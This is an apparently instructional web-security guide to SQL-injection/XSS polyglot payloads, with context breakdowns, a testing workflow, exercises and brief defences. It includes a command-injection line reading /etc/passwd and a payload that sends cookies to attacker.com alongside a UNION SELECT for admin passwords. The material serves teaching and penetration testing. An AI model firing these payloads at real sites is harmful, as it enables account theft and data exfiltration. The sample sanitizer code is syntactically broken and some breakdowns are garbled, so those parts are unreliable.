Polyglot payloads are single inputs that work across multiple vulnerability contexts simultaneously. This guide covers payloads that function as both SQL injection and XSS attacks, reducing the number of requests needed during testing.
A polyglot payload exploits multiple vulnerabilities with a single string. In web security, this means one payload that triggers different vulnerabilities depending on context.
| Benefit | Description |
|---|---|
| Efficiency | One request tests multiple vulnerabilities |
| Obfuscation | Harder for filters to detect intent |
| Coverage | Uncovers chained vulnerabilities |
| Real-world | Mirrors actual attack scenarios |
Payload:
'">><script>alert(1)</script>' OR '1'='1'--
SQL Context:
SELECT * FROM users WHERE name = ''">><script>alert(1)</script>' OR '1'='1'--'
-- Executes: OR '1'='1 (always true)HTML Context:
<div>
'">>
<script>
alert(1)
</script>
' OR '1'='1'--
</div>
-- Executes:
<script>
alert(1)
</script>Payload:
'" onclick="alert(1)" OR 1=1--
SQL Injection:
WHERE field = ''" onclick="alert(1)" OR 1=1--'
-- Always true conditionHTML Attribute:
<input value='" onclick="alert(1)" OR 1=1--' /> -- Clickable XSSPayload:
'">><marquee onstart=alert(1)>' OR 1=1--
Breakdown:
'- Escapes SQL string">- Escapes HTML attribute>- Closes HTML tag<marquee onstart=alert(1)>- XSS payload'- Opens SQL string againOR 1=1- SQL injection--- SQL comment
Payload:
';alert(1);' OR '1'='1'--
JavaScript Context:
var x = '';alert(1);' OR '1'='1'--';
// Executes: alert(1)SQL Context:
WHERE field = '';alert(1);' OR '1'='1'--'
-- Executes: OR '1'='1'Payload:
'"/><img src=x onerror=alert(1)> OR 1=1--
HTML Context:
<input value='"/><img src=x onerror=alert(1)> OR 1=1--' /> -- Image loads with XSSSQL Context:
WHERE field = '"/><img src=x onerror=alert(1)> OR 1=1--'
-- Always truePayload:
';alert(1);'; cat /etc/passwd; echo '
SQL Context:
WHERE field = '';alert(1);'; cat /etc/passwd; echo '';
-- Executes: alert(1) as string concatJavaScript Context:
var x = '';alert(1);'; cat /etc/passwd; echo '';
-- Executes: alert(1)Command Context:
echo '';alert(1);'; cat /etc/passwd; echo '';
# Executes: cat /etc/passwdPayload:
{
"name": "'\"><script>alert(1)</script>' OR 1=1--"
}Multiple Contexts:
- JSON parser: Valid string
- SQL query: Injection payload
- HTML display: XSS payload
Payload:
<user>'"/><script>alert(1)</script>' OR 1=1--</user>Multiple Contexts:
- XML parser: Valid text
- SQL query: Injection payload
- HTML rendering: XSS payload
Step 1: Send Polyglot Payload
POST /search HTTP/1.1
Content-Type: application/x-www-form-urlencoded
query='"><script>alert(1)</script>' OR 1=1--Step 2: Observe Multiple Responses
| Context | Indicator |
|---|---|
| SQL Injection | Different result set, error message |
| XSS | Alert popup, script execution |
| HTML | Rendered tags, styling changes |
Step 3: Confirm Vulnerabilities
If polyglot triggers:
- Test SQL injection separately
- Test XSS separately
- Determine if chained exploitation possible
Application:
- Search box displays results on page
- Search term stored in database
- Search history shown to users
Polyglot:
'">><img src=x onerror=alert(1)> OR 1=1--
Impact:
- SQL injection returns all results
- XSS executes when other users view history
- Stored XSS + SQL injection combo
Application:
- User comments stored in database
- Comments displayed to all users
- Admin panel shows all comments
Polyglot:
'"/><script>fetch('https://attacker.com/?c='+document.cookie)</script>'
UNION SELECT username,password FROM admin--
Impact:
- SQL injection extracts admin credentials
- XSS steals session cookies
- Data exfiltration to attacker server
Application:
- Profile fields saved to database
- Profile displayed on public pages
- Multiple output contexts
Polyglot:
';alert(1);' OR 1=1;--Impact:
- SQL injection modifies other profiles
- XSS executes when viewing profile
- JavaScript injection if field used in JS
'">><script>alert(1)</script>' AND 1=1--
'">><script>alert(1)</script>' AND 1=1--
'">><script>alert(1)</script>' OR 1=1--
'">><script>alert(1)</script>' OR 1=1 FROM DUAL--
Check:
- Input stored in database (SQL context)
- Input displayed on pages (HTML context)
- Input used in JavaScript (JS context)
- Input reflected in responses (XSS context)
Opportunity Matrix:
| Stored? | Displayed? | JavaScript? | Polyglot Potential |
|---|---|---|---|
| Yes | Yes | Yes | High |
| Yes | Yes | No | Medium |
| No | Yes | Yes | Low (XSS only) |
| Yes | No | Yes | Low (SQL only) |
Layer 1: Input Validation
import re
def sanitize_input(user_input):
# Remove dangerous characters
cleaned = re.sub(r'[<>'"";]', '', user_input)
return cleanedLayer 2: Context-Specific Output Encoding
# HTML context
import html
html.escape(user_input)
# SQL context (use parameterized queries)
cursor.execute("SELECT * FROM users WHERE name = ?", (user_input,))
# JavaScript context
json.dumps(user_input)Layer 3: Content Security Policy
Content-Security-Policy: default-src 'self'; script-src 'none'Setup:
- Application with search feature
- Results displayed on same page
Task:
- Send SQL injection + XSS polyglot
- Confirm both vulnerabilities trigger
- Exploit chained vulnerability
Payload:
'">><script>alert(1)</script>' OR 1=1--
Setup:
- Comment system with database storage
- Comments visible to all users
Task:
- Inject polyglot comment
- Verify SQL injection works
- Confirm XSS executes for other users
Setup:
- Profile field used in multiple contexts
Task:
- Craft payload for SQL + XSS + JS contexts
- Test in each context
- Maximize impact
- Polyglots test multiple vulnerabilities with one request
- Context matters - Same payload works differently
- Stored XSS + SQL injection = powerful combo
- Defense requires context-aware encoding
- Efficiency gain - Reduce testing requests significantly
Continue to 20 - Multibyte Encoding Bypass to learn about character set-based bypasses.